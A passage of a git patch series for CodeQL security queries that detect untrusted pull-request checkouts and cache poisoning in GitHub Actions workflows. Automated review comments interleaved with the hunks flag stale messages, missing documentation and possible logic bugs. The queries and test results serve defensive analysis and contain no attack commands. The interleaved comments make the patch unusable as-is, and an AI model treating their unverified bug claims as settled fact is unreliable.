b/ql/lib/codeql/actions/Ast.qll 
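Review bot: The alert message in `UntrustedCheckoutMedium.ql` still reads "…on privileged workflow." although the only remaining condition is `inNonPrivilegedContext(checkout)`, so every result of this query describes itself as privileged when it is by construction the non-privileged case. I would change the select to `select checkout, "Potential unsafe checkout of untrusted pull request on non-privileged workflow."` so triage is not misled by the text. The comment `// the checkout occurs in a non-privileged context` already says the right thing; the message should match it.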
@@ -74,25 +74,15 @@ class CompositeAction extends AstNode instanceof CompositeActionImpl { Input getInput(string inputName) { result = super.getInput(inputName) } - LocalJob getACaller() { result = super.getACaller() } + LocalJob getACallerJob() { result = super.getACallerJob() } + + UsesStep getACallerStep() { result = super.getACallerStep() } predicate isPrivileged() { super.isPrivileged() } predicate isPrivilegedExternallyTriggerable() { super.isPrivilegedExternallyTriggerable() } } -/** - * An `runs` mapping in a custom composite action YAML. - * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions#runs - */ -class Runs extends AstNode instanceof RunsImpl { - CompositeAction getAction() { result = super.getAction() } - - Step getAStep() { result = super.getAStep() } - - Step getStep(int i) { result = super.getStep(i) } -} - /** * An Actions workflow. This is a mapping at the top level of an Actions YAML workflow file. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. 
@@ -213,12 +203,26 @@ abstract class Job extends AstNode instanceof JobImpl { predicate isPrivilegedExternallyTriggerable() { super.isPrivilegedExternallyTriggerable() } } -class LocalJob extends Job instanceof LocalJobImpl { +abstract class StepsContainer extends AstNode instanceof StepsContainerImpl { Step getAStep() { result = super.getAStep() } Step getStep(int i) { result = super.getStep(i) } } +/** + * An `runs` mapping in a custom composite action YAML. + * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions#runs + */ +class Runs extends StepsContainer instanceof RunsImpl { + CompositeAction getAction() { result = super.getAction() } +} + +/** + * An Actions job within a workflow which is composed of steps. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobs. + */ +class LocalJob extends Job, StepsContainer instanceof LocalJobImpl { } + /** * A step within an Actions job. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idsteps. @@ -230,6 +234,8 @@ class Step extends AstNode instanceof StepImpl { If getIf() { result = super.getIf() } + StepsContainer getContainer() { result = super.getContainer() } + Step getAFollowingStep() { result = super.getAFollowingStep() } } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 9416b39e1059..5c07a61e66e4 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
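Review bot: `StepsContainer` is the one new public class in this hunk without a QLDoc comment, while `Runs`, `LocalJob` and `Step` each carry one; since it is an `abstract` class that downstream queries will now type against, it should say what it abstracts. I would add, above `abstract class StepsContainer`, `/** A node that holds an ordered sequence of steps: either the `runs` mapping of a composite action or a job with a `steps` key. */`. Likewise `Step.getContainer()` deserves a one-liner such as `/** Gets the `Runs` or `LocalJob` that directly contains this step. */` so callers know it is the immediate container rather than an enclosing job.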
@@ -301,8 +301,10 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { result.getNode().getValue() = name } - LocalJobImpl getACaller() { - exists(LocalJobImpl caller, string gwf_path, string path | + LocalJobImpl getACallerJob() { result = this.getACallerStep().getEnclosingJob() } + + UsesStepImpl getACallerStep() { + exists(UsesStepImpl caller, string gwf_path, string path | // the workflow files may not be rooted in the parent directory of .github/workflows // extract the offset so we can remove it from the action path gwf_path = @@ -312,8 +314,7 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { .getRelativePath() .prefix(caller.getLocation().getFile().getRelativePath().indexOf(".github/workflows/")) and path = this.getLocation().getFile().getRelativePath().replaceAll(gwf_path, "") and - caller.getAStep().(UsesStepImpl).getCallee() = - path.prefix(path.indexOf(["/action.yml", "/action.yaml"])) and + caller.getCallee() = ["", "./"] + path.prefix(path.indexOf(["/action.yml", "/action.yaml"])) and result = caller ) } @@ -327,7 +328,7 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { private predicate hasExplicitWritePermission() { // a calling job has an explicit write permission - this.getACaller().getPermissions().getAPermission().matches("%write") + this.getACallerJob().getPermissions().getAPermission().matches("%write") } /** Holds if the action is privileged. */ @@ -340,10 +341,10 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { or // there is a privileged caller job ( - this.getACaller().isPrivileged() + this.getACallerJob().isPrivileged() or - not this.getACaller().isPrivileged() and - this.getACaller().getATriggerEvent().isPrivileged() + not this.getACallerJob().isPrivileged() and + this.getACallerJob().getATriggerEvent().isPrivileged() ) } 
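Review bot: In `getACallerStep`, `path = this.getLocation().getFile().getRelativePath().replaceAll(gwf_path, "")` removes every occurrence of the workflow-directory prefix from the action's path, not only the leading one, so an action checked into a subdirectory whose name repeats that prefix would be matched against the wrong `uses:` value; stripping with `suffix(gwf_path.length())` on a path that `matches(gwf_path + "%")` only removes the prefix. Separately, `getACallerJob()` is now derived from `getACallerStep().getEnclosingJob()`, so when a composite action is called from another composite action the caller step presumably has no enclosing job and `isPrivileged()`/`hasExplicitWritePermission()` fall through silently — worth a comment, or a `getACallerJob()` that also recurses through the calling action. The class continues outside the hunk.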
@@ -351,7 +352,7 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { predicate isPrivilegedExternallyTriggerable() { // the action is externally triggerable exists(JobImpl caller, EventImpl event | - caller = this.getACaller() and + caller = this.getACallerJob() and event = caller.getATriggerEvent() and event.isExternallyTriggerable() and // the action is privileged @@ -433,33 +434,6 @@ class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { } } -class RunsImpl extends AstNodeImpl, TRunsNode { - YamlMapping n; - - RunsImpl() { this = TRunsNode(n) } - - override string toString() { result = n.toString() } - - override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } - - override CompositeActionImpl getParentNode() { result.getAChildNode() = this } - - override string getAPrimaryQlClass() { result = "RunsImpl" } - - override Location getLocation() { result = n.getLocation() } - - override YamlMapping getNode() { result = n } - - /** Gets the action that this `runs` mapping is in. */ - CompositeActionImpl getAction() { result = this.getParentNode() } - - /** Gets any steps that are defined within this job. */ - StepImpl getAStep() { result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(_) } - - /** Gets the step at the given index within this job. */ - StepImpl getStep(int i) { result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(i) } -} - class InputsImpl extends AstNodeImpl, TInputsNode { YamlMapping n; 
@@ -946,14 +920,57 @@ class JobImpl extends AstNodeImpl, TJobNode {
 }
 }
-class LocalJobImpl extends JobImpl {
+abstract class StepsContainerImpl extends AstNodeImpl {
+ /** Gets any steps that are defined within this job. */
+ abstract StepImpl getAStep();
+
+ /** Gets the step at the given index within this job. */
+ abstract StepImpl getStep(int i);
+}
+
+class RunsImpl extends StepsContainerImpl, TRunsNode {
+ YamlMapping n;
+
+ RunsImpl() { this = TRunsNode(n) }
+
+ override string toString() { result = n.toString() }
+
+ override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() }
+
+ override CompositeActionImpl getParentNode() { result.getAChildNode() = this }
+
+ override string getAPrimaryQlClass() { result = "RunsImpl" }
+
+ override Location getLocation() { result = n.getLocation() }
+
+ override YamlMapping getNode() { result = n }
+
+ /** Gets the action that this `runs` mapping is in. */
+ CompositeActionImpl getAction() { result = this.getParentNode() }
+
+ /** Gets any steps that are defined within this job. */
+ override StepImpl getAStep() {
+ result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(_)
+ }
+
+ /** Gets the step at the given index within this job. */
+ override StepImpl getStep(int i) {
+ result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(i)
+ }
+}
+
+class LocalJobImpl extends JobImpl, StepsContainerImpl {
 LocalJobImpl() { n.maps(any(YamlString s | s.getValue() = "steps"), _) }
 /** Gets any steps that are defined within this job. */
- StepImpl getAStep() { result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(_) }
+ override StepImpl getAStep() {
+ result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(_)
+ }
 /** Gets the step at the given index within this job.
*/
- StepImpl getStep(int i) { result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(i) }
+ override StepImpl getStep(int i) {
+ result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(i)
+ }
 }
 class StepImpl extends AstNodeImpl, TStepNode {
@@ -965,7 +982,10 @@ class StepImpl extends AstNodeImpl, TStepNode {
 override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() }
- override JobImpl getParentNode() { result.getAChildNode() = this }
+ override AstNodeImpl getParentNode() {
+ result.getAChildNode() = this and
+ (result instanceof LocalJobImpl or result instanceof RunsImpl)
+ }
 override string getAPrimaryQlClass() { result = "StepImpl" }
@@ -981,12 +1001,37 @@ class StepImpl extends AstNodeImpl, TStepNode {
 /** Gets the value of the `if` field in this step, if any. */
 IfImpl getIf() { result.getNode() = n.lookup("if") }
+ /** Gets the Runs or LocalJob that this step is in. */
+ StepsContainerImpl getContainer() { result.getNode() = n.getParentNode() }
+
 /** Gets a step that follows this step. */
 StepImpl getAFollowingStep() {
- exists(LocalJobImpl job, int i, int j |
- job.getStep(i) = this and
- result = job.getStep(j) and
- i < j
+ (
+ // next step in the same job
+ exists(LocalJobImpl job, int i, int j |
+ job.getStep(i) = this and
+ result = job.getStep(j) and
+ i < j
+ )
+ or
+ // next steps in a composite action
+ exists(RunsImpl runs, int i, int j |
+ exists(this.getEnclosingCompositeAction()) and
+ runs.getStep(i) = this and
+ result = runs.getStep(j) and
+ i < j
+ )
+ or
+ // next steps of the caller (in a composite action step)
+ result = this.getEnclosingCompositeAction().getACallerStep().getAFollowingStep()
+ or
+ // if any of the next steps is a call to a local composite actions, we should follow it
+ exists(LocalJobImpl job, int i, int j, CompositeActionImpl a |
+ job.getStep(i) = this and
+ i < j and
+ a.getACallerStep() = job.getStep(j) and
+ result = a.getRuns().getAStep()
+ )
 )
 }
 }
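Review bot: The QLDoc on `StepsContainerImpl.getAStep()`/`getStep(int)` and on the `RunsImpl` overrides says "within this job", but a `RunsImpl` is the `runs` mapping of a composite action, not a job; the text was carried over from `LocalJobImpl`. On the abstract class, `/** Gets any step defined in this container's `steps` sequence (a local job or a composite action's `runs`). */` and `/** Gets the step at the given 0-based index of this container's `steps` sequence. */` would fit, with "this `runs` mapping" in the `RunsImpl` overrides. The abstract class itself has no QLDoc either; a one-liner such as `/** A node that owns a `steps` sequence: a local job or a composite action's `runs` mapping. */` would help readers of `StepImpl.getContainer()`.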
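Review bot: `getContainer()` compares `result.getNode()` with `n.getParentNode()`, but a step mapping's YAML parent is presumably the `steps` sequence rather than the job or `runs` mapping that `LocalJobImpl`/`RunsImpl.getNode()` return, in which case the predicate never holds; the `getParentNode()` override added in the hunk above already selects exactly those two containers, so `StepsContainerImpl getContainer() { result = this.getParentNode() }` looks like the intended definition — verify with a composite-action test. In `getAFollowingStep()`, the second disjunct's `exists(this.getEnclosingCompositeAction())` appears to be implied by `runs.getStep(i) = this` and could go. The third disjunct recurses through the caller's following steps while the fourth descends into called actions; that is fine for a fixpoint, but the QLDoc should say the relation is transitive (every later step, not only the next one), since the query `edges` predicates build paths from it.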
From 44911382afd952d5052184e8ac552cb5446b1852 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Fri, 12 Jul 2024 23:49:05 +0200
Subject: [PATCH 415/707] feat(tests): Update tests results
---
 .../Security/CWE-829/UntrustedCheckoutCritical.expected | 1 +
 1 file changed, 1 insertion(+)
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
index ce6d75bf1132..60f3370f6d17 100644
--- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
@@ -365,5 +365,6 @@ edges
 | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow. |
 | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. |
 | .github/workflows/test9.yml:16:9:17:48 | Run Step | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | Execution of untrusted code on a privileged workflow. |
+| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow. |
 | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. |
 | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. |
From c1d8ca09768247604b16f342fb630ee7aa2319d2 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Sat, 13 Jul 2024 00:01:49 +0200
Subject: [PATCH 416/707] Bump qlpack versions
---
 ql/lib/qlpack.yml | 2 +-
 ql/src/qlpack.yml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index 4b237b4bfd3c..f5cf222d25c7 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@
 library: true
 warnOnImplicitThis: true
 name: github/actions-all
-version: 0.1.19
+version: 0.1.20
 dependencies:
 codeql/util: ^1.0.1
 codeql/yaml: ^1.0.1
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index 4d522db3f98a..6def1dfc0c82 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: github/actions-queries
-version: 0.1.19
+version: 0.1.20
 groups: [actions, queries]
 suites: codeql-suites
 extractor: javascript
From cc64c95dbc498be84227bf27126600a9600f3416 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Sat, 13 Jul 2024 23:28:47 +0200
Subject: [PATCH 417/707] feat(dataflow): Update edges predicate to only link to next step
Previously each step was linking to all possible following steps. This change makes a better flow path explanation flowing from the checkout to the poisonable step, step by step
---
 ql/lib/codeql/actions/Ast.qll | 2 +
 ql/lib/codeql/actions/ast/internal/Ast.qll | 52 +++--
 ql/src/Security/CWE-349/CachePoisoning.ql | 2 +-
 .../UntrustedCheckoutTOCTOUCritical.ql | 2 +-
 .../CWE-829/UntrustedCheckoutCritical.ql | 2 +-
 .../Security/CWE-349/CachePoisoning.expected | 92 --------
 .../UntrustedCheckoutTOCTOUCritical.expected | 5 -
 .../UntrustedCheckoutCritical.expected | 207 +-----------------
 8 files changed, 42 insertions(+), 322 deletions(-)
diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll
index 5c6cdc141eed..23832b35bd59 100644
--- a/ql/lib/codeql/actions/Ast.qll
+++ b/ql/lib/codeql/actions/Ast.qll
@@ -236,6 +236,8 @@ class Step extends AstNode instanceof StepImpl {
 StepsContainer getContainer() { result = super.getContainer() }
+ Step getNextStep() { result = super.getNextStep() }
+
 Step getAFollowingStep() { result = super.getAFollowingStep() }
 }
diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll
index 5c07a61e66e4..e920a558c73e 100644
--- a/ql/lib/codeql/actions/ast/internal/Ast.qll
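Review bot: `Step.getNextStep()` joins the public API without QLDoc; the neighbouring wrappers in this hunk have none either, but this one carries non-obvious semantics (per the internal implementation in this commit it descends into a called local composite action and returns to the caller after the action's last step), so the public class is where a reader will look for it. `/** Gets the step executed immediately after this one, descending into a called local composite action and returning to the caller's following step after the action's last step. */` would cover it.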
+++ b/ql/lib/codeql/actions/ast/internal/Ast.qll
@@ -1002,23 +1002,43 @@ class StepImpl extends AstNodeImpl, TStepNode {
 IfImpl getIf() { result.getNode() = n.lookup("if") }
 /** Gets the Runs or LocalJob that this step is in. */
- StepsContainerImpl getContainer() { result.getNode() = n.getParentNode() }
+ StepsContainerImpl getContainer() {
+ result = this.getParentNode().(RunsImpl) or
+ result = this.getParentNode().(LocalJobImpl)
+ }
+
+ StepImpl getNextStep() {
+ // if step is a uses step calling a local composite action, we should follow the called step
+ this instanceof UsesStepImpl and
+ exists(CompositeActionImpl a |
+ a.getACallerStep() = this and
+ result = a.getRuns().getStep(0)
+ )
+ or
+ // if step is the last step in a composite action, we should follow the next step in the caller
+ exists(RunsImpl runs, StepsContainerImpl caller_container, StepImpl caller, int i |
+ this.getContainer() = runs and
+ runs.getStep(count(StepImpl s | runs.getAStep() = s | s) - 1) = this and
+ runs.getEnclosingCompositeAction().getACallerStep() = caller and
+ caller.getContainer() = caller_container and
+ caller_container.getStep(i) = caller and
+ caller_container.getStep(i + 1) = result
+ )
+ or
+ // next step in the same job/runs
+ exists(int i |
+ this.getContainer().getStep(i) = this and
+ result = this.getContainer().getStep(i + 1)
+ )
+ }
 /** Gets a step that follows this step. */
 StepImpl getAFollowingStep() {
 (
- // next step in the same job
- exists(LocalJobImpl job, int i, int j |
- job.getStep(i) = this and
- result = job.getStep(j) and
- i < j
- )
- or
- // next steps in a composite action
- exists(RunsImpl runs, int i, int j |
- exists(this.getEnclosingCompositeAction()) and
- runs.getStep(i) = this and
- result = runs.getStep(j) and
+ // next steps in the same job/runs
+ exists(int i, int j |
+ this.getContainer().getStep(i) = this and
+ result = this.getContainer().getStep(j) and
 i < j
 )
 or
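Review bot: A `uses` step that calls a local composite action gets two successors from `getNextStep()`: the action's first step from the first disjunct, and its own sibling `getStep(i + 1)` from the third, because nothing excludes the already-handled case from the last disjunct — so `edges` still offers a path that skips the action's steps, which the commit message says it wants to avoid. Guarding the third disjunct with `not exists(CompositeActionImpl a | a.getACallerStep() = this and exists(a.getRuns().getStep(0)))` keeps the direct edge only for called actions that have no steps. The return edge in the second disjunct stops at `caller_container.getStep(i + 1)`; if `caller` is itself the last step of another composite action's `runs` (nested local actions, should the model admit them), no successor is produced and the path ends there. Minor: `this instanceof UsesStepImpl` is implied by `a.getACallerStep() = this`, since `getACallerStep()` is typed `UsesStepImpl`, and `count(StepImpl s | runs.getAStep() = s | s)` reads more simply as `count(runs.getAStep())`. The predicate also lacks QLDoc; `/** Gets the step executed immediately after this one, descending into a called local composite action and returning to the caller's following step after the action's last step. */` would match the file's style.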
@@ -1026,10 +1046,10 @@ class StepImpl extends AstNodeImpl, TStepNode {
 result = this.getEnclosingCompositeAction().getACallerStep().getAFollowingStep()
 or
 // if any of the next steps is a call to a local composite actions, we should follow it
- exists(LocalJobImpl job, int i, int j, CompositeActionImpl a |
- job.getStep(i) = this and
+ exists(int i, int j, CompositeActionImpl a |
+ this.getContainer().getStep(i) = this and
+ this.getContainer().getStep(j) = a.getACallerStep() and
 i < j and
- a.getACallerStep() = job.getStep(j) and
 result = a.getRuns().getAStep()
 )
 )
diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql
index 607a13e142c0..3b69110ed129 100644
--- a/ql/src/Security/CWE-349/CachePoisoning.ql
+++ b/ql/src/Security/CWE-349/CachePoisoning.ql
@@ -17,7 +17,7 @@ import codeql.actions.security.CachePoisoningQuery
 import codeql.actions.security.PoisonableSteps
 import codeql.actions.security.ControlChecks
-query predicate edges(Step a, Step b) { a.getAFollowingStep() = b }
+query predicate edges(Step a, Step b) { a.getNextStep() = b }
 from LocalJob j, Event e, PRHeadCheckoutStep checkout, Step s
 where
diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql
index 2656b22e1e31..a97309ce187b 100644
--- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql
+++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql
@@ -16,7 +16,7 @@ import codeql.actions.security.UntrustedCheckoutQuery
 import codeql.actions.security.PoisonableSteps
 import codeql.actions.security.ControlChecks
-query predicate edges(Step a, Step b) { a.getAFollowingStep() = b }
+query predicate edges(Step a, Step b) { a.getNextStep() = b }
 from LocalJob j, MutableRefCheckoutStep checkout, PoisonableStep s, ControlCheck check
 where
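Review bot: `edges` now uses the single-step `getNextStep()` relation while the `where` clause below the hunk (not visible here) presumably still connects `checkout` to `s` through the transitive `getAFollowingStep()`; the two relations are maintained by hand in internal/Ast.qll and already differ in shape (the transitive one has a direct caller-following-step disjunct), so a pair can be selected that has no path in `edges`, which path-problem consumers render as a finding without a path. Defining `getAFollowingStep()` as `getNextStep+()`, or adding a test asserting that every selected pair is connected in `edges`, would keep them in lockstep. The same applies to the CWE-367 hunk below and to the CWE-829 hunk in the next file.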
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql
index 02054ebbf0ab..2026a784d055 100644
--- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql
+++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql
@@ -18,7 +18,7 @@ import codeql.actions.security.UntrustedCheckoutQuery
 import codeql.actions.security.PoisonableSteps
 import codeql.actions.security.ControlChecks
-query predicate edges(Step a, Step b) { a.getAFollowingStep() = b }
+query predicate edges(Step a, Step b) { a.getNextStep() = b }
 from PRHeadCheckoutStep checkout, PoisonableStep s
 where
diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected
index eb1412bf0e28..994beb3b74f5 100644
--- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected
+++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected
@@ -1,159 +1,67 @@ edges | .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | -| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | -| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:47:9:52:6 | Run Step | -| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:52:9:58:24 | Run Step | | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | -| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:47:9:52:6 | Run Step | -| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:47:9:52:6 | Run Step | -| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | | .github/workflows/poc2.yml:47:9:52:6 | Run Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:25:7:31:4 | Uses Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | 
.github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | -| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | -| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | -| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | -| 
.github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:36:9:38:6 | Uses Step | -| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | -| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | | .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | -| .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | | .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | | .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:13:9:18:6 | Uses Step | -| .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:18:9:22:6 | Uses Step | -| .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:22:9:23:21 | Run Step | | .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 
